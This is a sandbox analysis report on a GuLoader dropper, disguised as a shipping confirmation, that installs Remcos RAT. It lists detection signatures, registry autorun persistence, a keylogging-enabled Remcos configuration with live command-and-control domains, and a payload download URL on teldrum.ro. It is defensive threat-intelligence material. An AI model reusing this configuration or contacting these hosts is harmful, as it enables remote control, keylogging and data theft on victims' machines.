Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe

Overview

General Information

Sample name:Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
Analysis ID:1592408
MD5:dd009056ed546d7cb3b75ef74f748ced
SHA1:39fa6f07ceaf1d545c02702a18dcacc5c57acf0a
SHA256:bfe72721ad2c670966f0d1a30af60b5d697731c31afdd028ee316d32ab2e4e17
Tags:batexeuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\eftermodnendes\ringeagt\Garantis131.SulJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      C:\Users\user\AppData\Local\Temp\nsc44DF.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2125848795.00000000030D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              00000004.00000002.2983718490.0000000001660000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
                00000000.00000002.2125582739.00000000028CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
                  Click to see the 3 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Snecks
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Snecks

                  Stealing of Sensitive Information

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, ProcessId: 7700, TargetFilename: C:\ProgramData\remcos\logs.dat
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-16T05:10:54.309320+010028032702Potentially Bad Traffic192.168.2.449737109.99.162.14443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                  Source: C:\Users\user\AppData\Local\Temp\Feverish\Halvdelene.batReversingLabs: Detection: 60%
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeVirustotal: Detection: 29%Perma Link
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeReversingLabs: Detection: 60%
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910

                  Networking

                  barindex
                  Source: Malware configuration extractorURLs: linktreewealth.zapto.org
                  Source: Malware configuration extractorURLs: linktreewealth.zapto.org
                  Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
                  Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 109.99.162.14:443
                  Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: teldrum.ro
                  Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
                  Source: global trafficDNS traffic detected: DNS query: linktreewealthy.zapto.org
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, Halvdelene.bat.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002CD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin0x
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binA
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2990368035.0000000002FA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binHipssFricrestereamuschilor.ro/NJrdZqNcCtz102.bin
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binL
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.4:49737 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2989862644.0000000002D43000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe PID: 7700, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  System Summary

                  barindex
                  Source: initial sampleStatic PE information: Filename: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00406DA00_2_00406DA0
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_733B1BFF0_2_733B1BFF
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@3/1
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeCode function: 0_2_004021AF CoCreateInstance,0_2_004021AF
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile created: C:\Users\user\eftermodnendesJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsc44DE.tmpJump to behavior
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeVirustotal: Detection: 29%
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeReversingLabs: Detection: 60%
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile read: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeProcess created: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe "C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
                  Source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: mshtml.pdb source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp
                  Source: Binary string: mshtml.pdbUGP source: Awb_Shipping_confirmation_doc_010720257820020031808174CN18003010142025.bat.exe, 00000004.00000001.2124649802.0000000000649000.00000020.00000001.01000000.00000007.sdmp

                  Data Obfuscation

                  barindex
